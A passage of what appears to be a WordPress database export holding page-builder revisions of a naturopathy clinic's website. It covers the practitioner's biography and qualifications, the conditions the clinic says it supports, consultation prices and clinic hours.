header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><br /><br /></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\"></span></strong></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2024-02-28 18:17:28','2024-02-28 10:17:28','',28,'https://verdenaturopathy.com.au/?p=406',0,'revision','',0),(404,1,'2023-11-23 12:21:27','2023-11-23 04:21:27','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. Mel also runs Verde Botanicals, offering small-batch, handmade herbal remedies to keep her creative juices flowing. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121727_Instagram.jpg\" title_text=\"Screenshot_20231123_121727_Instagram\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121916_Instagram.jpg\" title_text=\"Screenshot_20231123_121916_Instagram\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\" sticky_enabled=\"0\"]<p><span style=\"font-family: Montserrat;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting or creating, you’ll most likely find her brewing a cuppa, chasing after her three children or off bushwalking.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Certifications: </span></strong></span></p>\n<p><span style=\"font-family: Montserrat;\">Bachelor of Health Science (Naturopathy) </span></p>\n<p><span style=\"font-family: Montserrat;\">Bachelor of Science (Biological Science) </span></p>\n<p><span style=\"font-family: Montserrat;\"><span>Accredited G.E.M.M. Practitioner - Gut Ecology and Metabolic Modulation</span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span></p>\n<p><span style=\"font-family: Montserrat;\">Australian Natural Therapist’s Association (ANTA)</span></p>\n<ul></ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#000000\" border_style_all=\"none\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#c7d3c0\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2023-11-23 12:21:27','2023-11-23 04:21:27','',27,'https://verdenaturopathy.com.au/?p=404',0,'revision','',0),(408,1,'2024-03-13 12:55:37','2024-03-13 04:55:37','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>We can support health in many conditions, including:</span></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\"><span>digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>nervous system imbalance (anxiety, low mood, stress, poor sleep, emotional imbalance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>metabolic dysfunction (insulin resistance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>immune dysfunction (autoimmunity, recurrent infections)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>thyroid conditions (hyper/hypothyroidism)</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance, infertility)</span></span><br /><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>skin health (acne, eczema/dermatitis, rosacea)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>cardiovascular health (chronic inflammation, high cholesterol)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>men\'s health (prostate issues, sexual health)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>children\'s health (poor immunity, digestive issues, behavioural issues)</span></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></span><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span>We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (60 min) - $160\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $85\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and 